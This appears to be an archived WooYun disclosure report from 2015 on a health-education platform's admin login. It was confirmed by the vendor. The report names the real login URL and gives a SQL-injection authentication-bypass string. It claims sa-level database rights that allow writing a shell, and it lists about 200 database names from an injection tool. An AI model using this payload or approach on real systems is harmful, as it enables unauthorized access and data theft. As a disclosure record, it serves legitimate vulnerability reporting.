乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-22: 细节已通知厂商并且等待厂商处理中 2015-09-23: 厂商已经确认,细节仅向厂商公开 2015-10-03: 细节向核心白帽子及相关领域专家公开 2015-10-13: 细节向普通白帽子公开 2015-10-23: 细节向实习白帽子公开 2015-11-07: 细节向公众公开
干巴爹
http://wspx.91huayi.com/secure/login.aspx
卫生教育平台管理员登录的地方对参数过滤不严格#权限绕过可以使用万能密码绕过登录验证
账号:1' or 1=1 or '1'='1密码:123123(任意字符)
#SQL注入万能密码这个地方讲道理的话是肯定有注入漏洞的
应该是给每个子站都分配了sa权限可以直接写shell
200数据库
available databases [199]:[*] 0724zkys[*] baicheng_wsglw[*] baishan_wsglw[*] BJ_JJPT[*] BjApply[*] bjhp[*] bjhp0801[*] ccme[*] changchun_wsglw[*] cme[*] cme_beihai[*] cme_binzhou[*] cme_bj[*] cme_haikou[*] cme_hezhou[*] cme_leshan[*] cme_local_common[*] cme_luzhou[*] cme_meishan[*] cme_middle_kjpt[*] cme_sd[*] cme_shenyang[*] cme_shenyang2[*] cme_shiyan[*] cme_shiyan2[*] cme_shiyan3[*] cme_wenzhou[*] cme_wenzhou2[*] cme_wenzhou3[*] cme_xjyfy[*] cme_yanbianzhou[*] cme_yanshi[*] cme_yantai[*] cme_yibin[*] cme_yiwu[*] cme_yunfu[*] cme_ziyang[*] cqwsw.net[*] czwsw[*] dlzwsw.91huayi[*] DS_HY_COMMON[*] exambd[*] ezine_wenzhou[*] ezine_yiwu2011[*] gd_wj[*] GPSS[*] GSYXH[*] gxav[*] gxwskjw[*] haoyisheng_guangdong[*] haoyisheng_shenzhen[*] hbno[*] hbno_mt[*] hljnk[*] hncme[*] hpexam[*] hpexam0801[*] hpexam_fj[*] hpexam_sz[*] hpst[*] hy_com[*] hy_com_shenyang[*] hy_com_shiyan[*] HY_ZhuanGang[*] hyzc[*] hzwj[*] hzwsw.net[*] jlshi[*] kjpt_cme[*] kjpt_common[*] kjpt_data_upgrade_hb[*] kjpt_data_upgrade_??[*] kjpt_posdata_swap[*] kmwsw[*] liaoyuan_wsglw[*] master[*] material[*] mmmadb[*] model[*] msdb[*] ncwsw[*] new_cme_back[*] new_cme_back0813[*] NnCommDB[*] pdsCommDB[*] ppct[*] praject_apply2[*] prjapply_dg[*] prjapply_gdfs[*] prjapply_gdhy[*] prjapply_gdjm[*] prjapply_gdyj[*] prjapply_gdzq[*] prjapply_gx[*] prjapply_hlj[*] prjapply_jd[*] prjapply_jl[*] prjapply_nc[*] prjapply_sd[*] prjapply_sdq[*] prjapply_shiyan[*] prjapply_sx[*] prjapply_xian[*] prjapply_zh[*] prjapply_zs[*] project.cqwsw.net[*] project_apply[*] project_xj[*] project_ya[*] project_yn[*] ProjectSY[*] qjwsw[*] rubbish[*] sdlc[*] sfjj[*] shiyan_wsglw[*] spwsw[*] sspa_gx[*] sspa_gxnn[*] suining_wsglw[*] swykCommDB[*] sywsw[*] sywsw.cn[*] taizhou_wsglw[*] tempdb[*] tmp[*] tmpunit??[*] toilet_water_apply[*] tonghua_wsglw[*] transcript[*] weinan_wsglw[*] wh_wsglw[*] wj_binzhou[*] wuhan_xmsb[*] wuhanma.org.cn[*] xian.wsglw.net[*] xianyangcme[*] XJWJ[*] xnwsw[*] xuancheng_wsglw[*] yaan.com[*] yanbian_wsglw[*] ylwsw[*] ynwsw[*] yulin_wsglw[*] yunfu[*] ZJ_ZYYS_Exam[*] ZJ_ZYYS_Train[*] zj_zyys_trun[*] zkys[*] zkys0801[*] zkys_bj[*] zkys_cq[*] zkys_fj[*] zkys_fj0227[*] zkys_fj_temp[*] zkys_gs[*] zkys_gx[*] zkys_gxlz[*] zkys_nm[*] zkys_sz[*] ZYYS_AH_Turn[*] ZYYS_BJ_Exam[*] ZYYS_BJ_Train[*] ZYYS_BJ_Turn[*] ZYYS_BJ_Turn0128[*] ZYYS_BJ_TURN1027[*] zyys_bj_turn_zy[*] zyys_bj_turn_zy_0813[*] zyys_cq_dsjyd[*] zyys_cq_train[*] zyys_gd_Exam[*] zyys_gd_train[*] zyys_gd_Turn[*] zyys_guangxi_turn[*] ZYYS_GX_Turn[*] ZYYS_HN_Exam[*] ZYYS_HN_Train[*] ZYYS_HN_Turn[*] zyys_jd_Exam[*] zyys_jd_train[*] zyys_jd_Turn[*] ZYYS_JL_Exam[*] ZYYS_JL_Train[*] ZYYS_JL_Turn[*] ZYYS_JL_Turn_ZY[*] ZYYS_NMG_Turn[*] zyys_qfs_turn[*] zyys_Shan_turn[*] zyys_Shan_turn_zy[*] ZYYS_SX_Turn[*] ZYYS_SX_Turn_ZY[*] zyys_zj_exam[*] ZYYS_ZJ_Exam_ZY[*] zyys_zj_train[*] ZYYS_ZJ_Train_ZY[*] zyys_zj_turn[*] ZYYS_ZJ_Turn_ZY[*] zyysht
数据库最高权限,200个库可以浏览,而且可以get shell
参数过滤
危害等级:高
漏洞Rank:20
确认时间:2015-09-23 15:27
感谢提交,已通知业务部门处理。
暂无